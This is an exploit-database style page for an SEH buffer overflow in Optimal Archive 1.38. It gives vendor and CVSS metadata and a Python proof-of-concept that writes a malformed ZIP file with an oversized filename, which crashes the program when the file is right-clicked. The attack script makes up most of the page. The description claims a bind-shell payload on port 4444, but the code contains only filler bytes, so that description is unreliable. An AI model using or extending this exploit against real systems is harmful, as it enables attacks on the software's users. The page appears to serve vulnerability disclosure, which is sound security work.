Optimal Archive 1.38 (.zip) 0day SEH PoC

vendor:

Optimal Archive

by:

TecR0c

7,8

CVSS

HIGH

SEH

119

CWE

Product Name: Optimal Archive

Affected Version From: 1.38

Affected Version To: 1.38

Patch Exists: YES

Related CWE: N/A

CPE: a:optimal_access:optimal_archive

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP sp3 En

2010

Optimal Archive 1.38 (.zip) 0day SEH PoC

This exploit is a proof of concept for a SEH vulnerability in Optimal Archive 1.38 (.zip). The exploit is triggered when a specially crafted zip file is right clicked. The payload used is a bind shell on port 4444.

Mitigation:

Update to the latest version of Optimal Archive 1.38 (.zip)

Source

Exploit-DB raw data:

#!/usr/bin/python
# #######################################################################
# Title:                Optimal Archive 1.38 (.zip) 0day SEH PoC
# Author:               TecR0c - http://tecninja.net/blog & http://twitter.com/TecR0c
# Found by:             TecR0c
# Download:             http://www.optimalaccess.com/oadownload.php?version=oarchive.exe
# Platform:             Windows XP sp3 En
# Advisory:             http://www.corelan.be:8800/advisories.php?id=CORELAN-10-017
# Greetz to:            Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

# Trigger : Right click on specially crafzip file > Boom
# Very strange behavior when debugging

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] optimal (.zip)  - by TecR0c"


ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00")

cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")

eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00"
"\x02\x10\x00\x00"
"\x00\x00")

buff = "\x42" * 2340
buff += "\x44" * 4
buff += "\x42" * (4064-len(buff))
buff += ".txt"

mefile = open('optimal.zip','w');
mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);
mefile.close()